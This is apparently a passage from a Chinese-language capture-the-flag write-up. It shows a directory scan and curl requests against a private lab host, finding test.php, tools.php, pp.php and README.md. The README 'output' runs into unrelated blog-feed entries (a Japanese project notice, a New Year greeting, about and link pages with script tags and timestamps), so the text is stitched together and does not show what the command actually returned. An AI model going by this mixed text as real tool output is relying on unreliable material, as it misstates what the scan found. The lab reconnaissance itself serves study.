true 💲 Extensions │ [php, html, md, txt] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 200 GET 48l 102w 2359c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 403 GET 7l 10w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 3l 1w 16c http://192.168.205.137/test.php 200 GET 2l 1w 17c http://192.168.205.137/tools.php 200 GET 1l 3w 228c http://192.168.205.137/README.md 200 GET 2l 1w 15c http://192.168.205.137/pp.php ``` 探索一下 ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.137/test.php <h1>test</h1> ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.137/tools.php <h1>tools</h1> ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.137/pp.php <h1>test</h1> ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.137/README.md 2025年1月22日　本プロジェクトの開発は一旦ここで終了です。https://7r1UMPH.github.io/post/Listen.htmlMon, 03 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/xin-nian-kuai-le-%EF%BC%81.html# 新年快乐！ 新的一年，愿你如东风破浪，事业蒸蒸日上，生活美满如意。https://7r1UMPH.github.io/post/xin-nian-kuai-le-%EF%BC%81.htmlWed, 29 Jan 2025 07:38:41 +0000https://7r1UMPH.github.io/about.html<!-- ##{'script':'<script src='https://7r1umph.top/plugins/AboutMe.js'></script>'}## -->。https://7r1UMPH.github.io/about.htmlThu, 20 Mar 2025 13:25:46 +0000https://7r1UMPH.github.io/link.html<!-- ##{'script':'<script src='https://7r1umph.top/plugins/FriendLinks.js'></script>'}## -->。https://7r1UMPH.github.io/link.htmlThu, 20 Mar 2025 13:26:17 +0000